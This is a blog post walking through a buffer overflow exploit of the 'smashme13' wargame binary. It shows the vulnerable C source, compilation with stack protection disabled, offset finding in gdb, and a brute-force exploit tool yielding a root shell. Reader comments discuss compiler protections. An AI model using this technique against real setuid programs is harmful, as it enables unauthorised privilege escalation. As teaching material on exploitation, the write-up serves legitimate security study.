break a time, with break the c0de…

easy pwn on smashme13


Here it is my tools in action…
The challenge is to smash this program with ASLR
And gaining root acess…

You can found real source here : http://www.shell-storm.org/smashme/files/smashme-13.php

/* Compiled on x86 64 bits*/

#include <stdio.h>
#include <string.h>

int smash(char*);

int main(int argc, char** argv)
{
    if (argc < 2) {
    fprintf(stderr, "usage: smashme <string>\n");
    exit(1);
    }
    smash(argv[1]);
    return 0;
}

int smash(char* egg)
{
    char buff[128];
    strcat(buff, egg);
    return 0;
}

Action…

gunslinger@c0debreaker:~/bof$ vim smashme13.c
gunslinger@c0debreaker:~/bof$ gcc -o smashme13 -fno-stack-protector -mpreferred-stack-boundary=2 -g smashme13.c
smashme13.c: In function ‘main’:
smashme13.c:12: warning: incompatible implicit declaration of built-in function ‘exit’
gunslinger@c0debreaker:~/bof$
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/smashme13 -s 1 -e 600

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 128 byte(s)
[!] Application got segmentation fault by giving 128 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 132
[*] Using return address 0xbf8f9fe4 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
^C
gunslinger@c0debreaker:~/bof$ ./smashme13 
usage: smashme <string>
gunslinger@c0debreaker:~/bof$ ./smashme13 a
gunslinger@c0debreaker:~/bof$ ./smashme13 `perl -e 'print "A" x 128'`
Segmentation fault
gunslinger@c0debreaker:~/bof$ gdb smashme13
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) r `perl -e 'print "A" x 132'`
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 132'`

Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
Current language:  auto; currently asm
(gdb) r `perl -e 'print "A" x 128'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 128'`

Program received signal SIGSEGV, Segmentation fault.
0xbfe138a4 in ?? ()
(gdb) r `perl -e 'print "A" x 150'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 150'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 148'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 148'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 144'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 144'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 142'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 142'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 140'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 120'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 120'`

Program exited normally.
(gdb) r `perl -e 'print "A" x 135'`
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 135'`

Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) r `perl -e 'print "A" x 136'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 136'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) disas main
Dump of assembler code for function main:
0x08048454 <main+0>:	push   %ebp
0x08048455 <main+1>:	mov    %esp,%ebp
0x08048457 <main+3>:	sub    $0x10,%esp
0x0804845a <main+6>:	cmpl   $0x1,0x8(%ebp)
0x0804845e <main+10>:	jg     0x8048491 <main+61>
0x08048460 <main+12>:	mov    0x804a01c,%eax
0x08048465 <main+17>:	mov    %eax,0xc(%esp)
0x08048469 <main+21>:	movl   $0x18,0x8(%esp)
0x08048471 <main+29>:	movl   $0x1,0x4(%esp)
0x08048479 <main+37>:	movl   $0x8048590,(%esp)
0x08048480 <main+44>:	call   0x8048368 <fwrite@plt>
0x08048485 <main+49>:	movl   $0x1,(%esp)
0x0804848c <main+56>:	call   0x8048388 <exit@plt>
0x08048491 <main+61>:	mov    0xc(%ebp),%eax
0x08048494 <main+64>:	add    $0x4,%eax
0x08048497 <main+67>:	mov    (%eax),%eax
0x08048499 <main+69>:	mov    %eax,(%esp)
0x0804849c <main+72>:	call   0x80484a8 <smash>
0x080484a1 <main+77>:	mov    $0x0,%eax
0x080484a6 <main+82>:	leave  
0x080484a7 <main+83>:	ret    
End of assembler dump.
(gdb) q
The program is running.  Exit anyway? (y or n) y
gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 136
[*] Using return address 0xbfab19a4 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# id
uid=1000(gunslinger) gid=1000(gunslinger) euid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$
Advertisements

7 responses

  1. wisdom

    maju terus bro gw suport dari belakang

    July 28, 2010 at 10:25 am

  2. Cyb3erFred0M

    om gun………………..kok pas lg proses buffernya gak berhenti sampai 404 byte ya nich masin berjalan sampai 20000 lebih itu kenapa ya…………….terus ini intinya buat apa sich bro gun

    July 31, 2010 at 11:09 am

    • mungkin path aplikasinya salah mungkin bro atau pas di compile ga gunain
      -fno-stack-protector -mpreferred-stack-boundary=2
      kedua opsi tersebut agar si aplikasi tidak di lindungi stack protector dan bisa di injectable

      August 1, 2010 at 6:42 am

  3. elite

    Try not to compile with -mpreferred-stack-boundary=2 to learn how to bypass ASLR and -fno-stack-protector to learn how to bypass compiler level protector.

    August 1, 2010 at 12:11 pm

    • its impossible because default application is using stack protector on current compiler now… not like old days compiler…

      August 2, 2010 at 5:18 am

  4. Cyb3erFred0M

    lo compile nya pake opsi tsb broo gun……….hehehehe tapi dah berhasil kok bro………….maju terus bro gun

    August 1, 2010 at 9:44 pm

  5. nice script gan … :D

    August 24, 2010 at 5:21 pm

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s